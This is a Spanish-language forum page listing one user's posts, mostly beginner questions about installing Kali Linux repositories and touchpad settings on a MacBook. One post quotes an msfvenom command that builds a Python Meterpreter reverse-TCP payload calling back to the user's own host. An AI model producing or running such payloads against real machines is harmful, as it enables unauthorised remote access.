elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 [2]
11  Seguridad Informática / Bugs y Exploits / Python error metasploit&kali en: 27 Febrero 2017, 18:38 pm
He usado metasploit en mj kali para crear un exploit para os x mediante "msfven -p python/meterpreter/reverse_tcp LHOST=(miip) LPORT=4444 R >prueba.py"
Y me dice que el payload que he seleccionado es invalido.
Alguien podría ayudarme?
Muchas gracias.
12  Sistemas Operativos / GNU/Linux / Click derecho touchpad Kali en: 21 Febrero 2017, 11:41 am
Buenos días,
Hace poco realice la particion de mi disco sd de un macbook pro para disponer de kali i os x en mi dispositivo. El caso es que hasta día de hoy aún no he conseguido poder hacaer click derecho con el touchpad. Alguien sabe como se activa la opcion, o como hacerlo, o algun driver?
Me sería de mucha ayuda.
Gracias.
PD: tengo un macbook pro 13" (medianos de 2012)
13  Sistemas Operativos / GNU/Linux / Re: INSTALACION REPOSITORIOS en: 18 Febrero 2017, 19:11 pm
Que es un espejo? Perdonen mi ignorancia

Muchas gracias por ayudar.
14  Sistemas Operativos / GNU/Linux / Re: INSTALACION REPOSITORIOS en: 18 Febrero 2017, 17:42 pm
Ya lo he probado y tambien me da error.

Saludos
15  Sistemas Operativos / GNU/Linux / Re: INSTALACION REPOSITORIOS en: 18 Febrero 2017, 14:51 pm
Alguna fuente fiable?


Gracias por contestar.
16  Sistemas Operativos / GNU/Linux / instalacion repositorios en: 18 Febrero 2017, 11:21 am
Hola buenos dias,
Hace muy poco he creado una particion de Kali en mi Macbook Pro, como entendereis soy nuevo en esto y a la hora de instalar los repositorios recomendados con el comando "nano /etc/apt/sources.list" copiando los repositorios i ejecutando "apt-get update" me sale este mensaje:

"algunos index no se han podido descargar. Se han descartado, on en su lugar se han utilizado los antiguos"

luego siguiendo con la instalacion, ejecuto el comando apt-get upgrade y me dice que no se ha actualizado nada.

Llevo un buen rato metido en esto y agradecería muchísimo ayuda.


· No se debe escribir en mayúsculas
>aquí las reglas del foro
-Engel Lex
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines